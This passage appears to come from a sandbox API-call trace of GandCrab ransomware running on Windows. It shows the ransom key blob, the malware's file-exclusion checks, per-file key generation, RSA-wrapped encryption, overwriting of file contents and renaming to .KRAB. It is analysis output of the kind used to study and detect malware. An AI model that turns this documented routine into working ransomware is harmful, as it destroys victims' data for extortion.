9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.485] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.485] CloseHandle (hObject=0x320) returned 1 [0100.486] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.486] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.486] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x2ad)) [0100.486] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.486] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.486] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.486] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\NetHood\\d2ca4a08d2ca4dee3d.lock") returned 48 [0100.486] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\nethood\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.487] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.487] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.487] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0100.487] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\NetHood\\*") returned="C:\\Users\\Default\\NetHood\\*" [0100.487] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.487] CloseHandle (hObject=0x320) returned 1 [0100.487] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.487] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0100.488] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0100.488] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0100.488] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.488] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.KRAB") returned 32 [0100.488] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0100.488] lstrlenW (lpString=".DAT") returned 4 [0100.488] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.488] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".DAT ") returned 5 [0100.488] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.488] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0100.488] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0100.488] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0100.488] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0100.488] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0100.488] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.489] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.489] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0100.489] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0100.489] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG1" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned="C:\\Users\\Default\\NTUSER.DAT.LOG1" [0100.489] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.489] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG1.KRAB") returned 37 [0100.489] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0100.489] lstrlenW (lpString=".LOG1") returned 5 [0100.489] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.489] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".LOG1 ") returned 6 [0100.489] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.489] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0100.489] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="desktop.ini") returned 1 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="autorun.inf") returned 1 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat") returned 1 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="iconcache.db") returned 1 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="bootsect.bak") returned 1 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="boot.ini") returned 1 [0100.489] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat.log") returned 1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="thumbs.db") returned -1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="KRAB-DECRYPT.html") returned 1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="KRAB-DECRYPT.txt") returned 1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="CRAB-DECRYPT.txt") returned 1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntldr") returned 1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="NTDETECT.COM") returned 1 [0100.490] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Bootfont.bin") returned 1 [0100.490] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.490] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10111b0) returned 1 [0100.490] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.491] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.491] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.491] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0100.491] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0100.491] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.491] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x10112c0) returned 1 [0100.492] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.492] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.492] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.492] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0100.492] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0100.492] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.493] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010f08) returned 1 [0100.493] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdae0) returned 1 [0100.493] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.493] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.493] GetLastError () returned 0x0 [0100.494] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0100.494] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0100.494] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010df8) returned 1 [0100.494] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbe0a0) returned 1 [0100.494] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.494] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.494] GetLastError () returned 0x0 [0100.494] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0100.494] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.494] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.495] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0100.495] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0100.496] ReadFile (in: hFile=0x320, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f47c*=0x6000, lpOverlapped=0x0) returned 1 [0100.552] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xffffa000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.553] WriteFile (in: hFile=0x320, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f478*=0x6000, lpOverlapped=0x0) returned 1 [0100.553] WriteFile (in: hFile=0x320, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0100.553] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.556] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.556] CloseHandle (hObject=0x320) returned 1 [0100.556] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.557] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.KRAB" (normalized: "c:\\users\\default\\ntuser.dat.log1.krab")) returned 1 [0100.557] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.557] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.558] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0100.558] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0100.558] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG2" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned="C:\\Users\\Default\\NTUSER.DAT.LOG2" [0100.558] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.558] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG2.KRAB") returned 37 [0100.558] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0100.558] lstrlenW (lpString=".LOG2") returned 5 [0100.558] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.558] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".LOG2 ") returned 6 [0100.558] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.558] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0100.558] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="desktop.ini") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="autorun.inf") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="iconcache.db") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="bootsect.bak") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="boot.ini") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat.log") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="thumbs.db") returned -1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="KRAB-DECRYPT.html") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="KRAB-DECRYPT.txt") returned 1 [0100.558] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="CRAB-DECRYPT.txt") returned 1 [0100.559] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntldr") returned 1 [0100.559] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="NTDETECT.COM") returned 1 [0100.559] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Bootfont.bin") returned 1 [0100.559] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.559] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1010df8) returned 1 [0100.559] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.559] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.560] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.560] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f44c | out: pbBuffer=0x338f44c) returned 1 [0100.560] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.560] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.560] CryptAcquireContextW (in: phProv=0x338f3b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3b4*=0x1011678) returned 1 [0100.560] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.560] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.561] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.561] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f46c | out: pbBuffer=0x338f46c) returned 1 [0100.561] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0100.561] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.561] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010df8) returned 1 [0100.561] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdae0) returned 1 [0100.561] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.561] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.561] GetLastError () returned 0x0 [0100.561] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0100.562] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.562] CryptAcquireContextW (in: phProv=0x338f3ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f3ac*=0x1010df8) returned 1 [0100.562] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f3b0 | out: phKey=0x338f3b0*=0xfbdfe0) returned 1 [0100.562] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338f3a4, pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.562] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.562] GetLastError () returned 0x0 [0100.562] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0100.562] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.562] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.563] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0100.563] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0100.563] ReadFile (in: hFile=0x320, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f47c*=0x7e000, lpOverlapped=0x0) returned 1 [0100.610] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff82000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.610] WriteFile (in: hFile=0x320, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x7e000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f478*=0x7e000, lpOverlapped=0x0) returned 1 [0100.612] WriteFile (in: hFile=0x320, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0100.612] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.616] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.618] CloseHandle (hObject=0x320) returned 1 [0100.632] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.633] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2.KRAB" (normalized: "c:\\users\\default\\ntuser.dat.log2.krab")) returned 1 [0100.634] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.634] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.634] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2=".") returned 1 [0100.634] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="..") returned 1 [0100.634] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf" [0100.635] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.635] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf.KRAB") returned 77 [0100.635] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0100.635] lstrlenW (lpString=".blf") returned 4 [0100.635] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.635] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".blf ") returned 5 [0100.635] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.636] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0100.636] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf") returned 72 [0100.636] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf", lpString2="desktop.ini") returned 1 